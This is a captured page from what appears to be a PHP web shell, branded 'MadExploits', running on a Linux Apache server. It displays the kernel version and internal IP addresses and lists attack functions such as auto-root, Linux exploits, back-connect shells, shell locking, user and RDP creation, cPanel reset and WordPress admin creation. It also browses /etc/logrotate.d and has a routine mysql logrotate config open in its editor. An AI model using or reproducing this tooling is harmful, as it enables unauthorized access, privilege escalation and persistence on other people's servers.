Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
etc /
logrotate.d /
[ HOME SHELL ]
Name
Size
Permission
Action
alternatives
120
B
-rw-r--r--
apache2
433
B
-rw-r--r--
apport
126
B
-rw-r--r--
apt
173
B
-rw-r--r--
bootlog
91
B
-rw-r--r--
btmp
130
B
-rw-r--r--
certbot
82
B
-rw-r--r--
cloud-init
144
B
-rw-r--r--
dbconfig-common
107
B
-rw-r--r--
dpkg
112
B
-rw-r--r--
mariadb
1.78
KB
-rw-r--r--
mysql-server.dpkg-bak
845
B
-rw-r--r--
nginx
329
B
-rw-r--r--
postgresql-common
173
B
-rw-r--r--
rsyslog
374
B
-rw-r--r--
samba
875
B
-rw-r--r--
sssd-common
174
B
-rw-r--r--
ubuntu-advantage-tools
270
B
-rw-r--r--
ufw
209
B
-rw-r--r--
unattended-upgrades
235
B
-rw-r--r--
vsftpd
126
B
-rw-r--r--
winbind
353
B
-rw-r--r--
wtmp
145
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mysql-server.dpkg-bak
# - I put everything in one block and added sharedscripts, so that mysql gets # flush-logs'd only once. # Else the binary logs would automatically increase by n times every day. # - The error log is obsolete, messages go to syslog now. /var/log/mysql.log /var/log/mysql/*log { daily rotate 7 missingok create 640 mysql adm compress sharedscripts postrotate test -x /usr/bin/mysqladmin || exit 0 # If this fails, check debian.conf! MYADMIN="/usr/bin/mysqladmin --defaults-file=/etc/mysql/debian.cnf" if [ -z "`$MYADMIN ping 2>/dev/null`" ]; then # Really no mysqld or rather a missing debian-sys-maint user? # If this occurs and is not a error please report a bug. #if ps cax | grep -q mysqld; then if killall -q -s0 -umysql mysqld; then exit 1 fi else $MYADMIN flush-logs fi endscript }
Close